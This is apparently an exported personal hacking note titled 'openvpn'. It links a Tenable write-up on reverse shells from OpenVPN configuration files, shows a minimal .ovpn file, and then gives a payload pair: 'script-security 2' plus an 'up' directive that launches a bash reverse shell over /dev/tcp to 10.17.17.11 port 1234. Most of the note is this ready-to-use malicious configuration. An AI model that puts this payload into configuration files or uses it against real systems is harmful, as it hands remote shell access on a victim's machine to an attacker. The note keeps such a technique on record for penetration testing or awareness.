<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>openvpn</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>openvpn</h1>

      <div class="ck-content">
        <p><a href="https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da">https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da</a> </p>
        <p>At its most simple form, an ovpn file looks like the this:</p>
        <blockquote>
          <p>remote 192.168.1.245
            <br />ifconfig 10.200.0.2 10.200.0.1
            <br />dev tun</p>
        </blockquote>
        <p>This directs the client to connect to the server at 192.168.1.245 without
          authentication or encryption and establish the tun interface for communication
          between the client (10.200.0.2) and the server (10.200.0.1).</p><pre><code class="language-text-plain">script-security 2
up "/bin/bash -c '/bin/bash -i &gt; /dev/tcp/10.17.17.11/1234 0&lt;&amp;1 2&gt;&amp;1&amp;'"</code></pre>
      </div>
    </div>
  </body>

</html>